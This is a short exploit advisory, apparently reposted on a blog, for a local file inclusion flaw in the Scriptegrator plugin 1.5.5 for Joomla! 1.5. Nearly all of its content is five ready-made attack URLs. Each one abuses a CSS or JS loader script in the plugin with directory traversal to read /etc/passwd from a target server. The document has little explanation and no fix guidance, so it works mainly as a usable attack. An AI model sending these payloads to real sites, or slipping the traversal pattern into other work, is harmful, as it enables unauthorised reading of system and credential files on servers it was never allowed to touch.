# Exploit Title: Scriptegrator plugin for Joomla! 1.5 0day File Inclusion # Originally Reported: Early 2011 # Independently Discovered: 20 April 2011 # Released: 13 June 2011 # Author: jdc # Software Link: http://www.greatjoomla.com/extensions/plugins/core-design-scriptegrator-plugin.html # Version: 1.5.5 `````````````````````````````````````````````````````````````````````````` It looks like this one was reported as in-use by someone else sometime around February (?) 2011: * http://www.greatjoomla.com/index.php?option=com_kunena&Itemid=171&func=view&catid=32&id=6310 Local File Inclusion ==================== http://[target]/plugins/system/cdscriptegrator/libraries/highslide/css/cssloader.php?files[]=../../../../../../../../../../../../etc/passwd.css http://[target]/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../etc/passwd.js http://[target]/plugins/system/cdscriptegrator/libraries/jquery/theme/cssloader.php?file=../../../../../../../../../../../../etc/passwd.css http://[target]/plugins/system/cdscriptegrator/libraries/jquery/js/jsloader.php?files[]=../../../../../../../../../../../../etc/passwd.js http://[target]/plugins/system/cdscriptegrator/libraries/jquery/js/ui/jsloader.php?file=../../../../../../../../../../../../etc/passwd.js
14 Jun 2011
Scriptegrator plugin for Joomla! 1.5 0day File Inclusion Vulnerability
Labels:
Exploit
Friends Blog
Sponsors :
Best Google Covers | Desktop Wallpaperslk | PSD Graphics
Copyright © 2012. bedegar - All Rights Reserved
Copyright © 2012. bedegar - All Rights Reserved